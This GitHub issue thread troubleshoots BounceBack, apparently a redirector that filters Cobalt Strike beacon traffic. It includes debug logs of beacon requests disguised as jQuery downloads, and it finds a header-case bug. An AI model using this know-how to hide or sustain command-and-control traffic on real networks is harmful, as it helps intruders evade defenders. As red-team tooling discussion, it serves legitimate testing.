2023-11-08T17:45:25+03:00 DBG New request from=192.168.40.129 headers={"Accept":["text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"],"Accept-Encoding":["gzip, deflate"],"Cache-Control":["no-cache"],"Connection":["Keep-Alive"],"Cookie":["__cfduid=jiJOtks55p8HeU7XqqTocs9verc1mwmPUas_gnsOtx5ZUstsq3YHPbjqW6Vz5hay5WmAtupYUZn2dES649mGD9bSnrTjgUN-oATHAQMVArEistKoy8id6diXFSqU2FPPwk3nuJNbuPzO1A10ZO6VeVxvlnPlLkSzZ2lFBVa_MmI"],"Host":["192.168.40.1"],"Referer":["http://code.jquery.com/"],"User-Agent":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20"]} method=GET proxy="example http proxy" url=/jquery-3.3.1.min.js
2023-11-08T17:45:25+03:00 DBG http-get match from=192.168.40.129 match= proxy="example http proxy" rule=example_malleable_rule
2023-11-08T17:45:25+03:00 DBG New request from=192.168.40.129 headers={"Accept":["text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"],"Accept-Encoding":["gzip, deflate"],"Cache-Control":["no-cache"],"Connection":["Keep-Alive"],"Content-Length":["96"],"Host":["192.168.40.1"],"Referer":["http://code.jquery.com/"],"User-Agent":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.34 Safari/537.36 Edg/81.0.416.20"]} method=POST proxy="example http proxy" url=/jquery-3.3.2.min.js?__cfduid=a06Awll6svBbdrnyXQ
2023-11-08T17:45:25+03:00 DBG http-post match from=192.168.40.129 match= proxy="example http proxy" rule=example_malleable_rule
Also checked your profile with set host_stage "true";
and it worked as intended.
After all, reading logs you provided I see that BounceBack can't find any matching profile (it's not related to user agents or stagers), so maybe you just mismatched profiles in CobaltStrike and BounceBack - please, recheck it. If no, please provide http (not https) traffic record, so I can check what's wrong with beacon requests.
P.S. in the next time, please, use issue templates and share such long things as profiles as gists/pastebin records.
First of all, I apologize for the trouble I caused Second thing, yes, I also checked the profile I presented and saw my mistake in the profile i pasted to worng one, however, I still get this error with a different profile (I'm just checking different profiles right now) can you check this profile for a moment?
https://gist.github.com/BlackSnufkin/b4e389c5a9cc0186ad460839536b85e5
And I confirmed everything twice with the profile, you can connect normally, but through the redirector I get that error
2023-11-08T16:04:43Z DBG Created new proxy listen=0.0.0.0:80 proxy=http_proxy target=http://127.0.0.1:8443 type=http
2023-11-08T16:04:43Z INF Starting proxy listen=0.0.0.0:80 proxy=http_proxy target=http://127.0.0.1:8443 type=http
2023-11-08T16:04:51Z DBG New request from=192.168.1.146 headers={"Accept":["*/*, */*"],"Accept-Language":["en-US"],"Cache-Control":["no-cache"],"Connection":["close"],"Cookie":["b=.12vPkW22o;_ga=GA1.2.875;d=DEPDDDHGIMDLMOMINHIMKHHFDPKJHHACMJDAGFHFLHPFJNILHKBKHGKHCAPGMNLDBFDAGHIJBJCNJGEAENJKLBNDHIAKCLKBNPMDLEGIACOLOMDNKMFIDNAJBPABIFEDNDAPNBIBGNLLMEAGOPOBADJMGEBIBDNBBHOAJNAGBJNFDMOADCDEBAFGGOLENCOKKKJNLKGPLGDDJNGOMHLMPLLBKPGBMJBNJDOCIALNNEMBJAGPLCJEABKDCADBPAJN;_ga=GA1.2.875;__ar_v4=%8867UMDGS643"],"Host":["192.168.1.145"],"Pragma":["no-cache"],"User-Agent":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.0 Safari/537.36 Edg/80.0.361.0"]} method=GET proxy=http_proxy url=/messages/JphH-5-kROC6Uf5RJr9y0NIIL
2023-11-08T16:06:27Z DBG http-get/post/stager did not match from=192.168.1.146 proxy=http_proxy rule=malleable_https_traffic
2023-11-08T16:06:27Z WRN Rejected from=192.168.1.146 proxy=http_proxy rule=malleable_https_traffic
Found a bug, beacon is sending Connection: Close
when BounceBack expects Connection: close
(see, first letter case has been changed).
As a fix, I'll make all header checks case insensitive. If you have any other suggestions for a fix (perhaps a list of headers that might have case-switching values), you can provide them.
Let me know when you're done playing with BounceBack malleable filter and I'll close the issue. If you find any other bugs while playing, please report them here.
@BlackSnufkin Any updates?
I haven't come across anything else, looks like it can be closed 👍
So for some reason profiles that are created with the help of the SourcePoint are getting rejected are blocked even though the host_stage set to false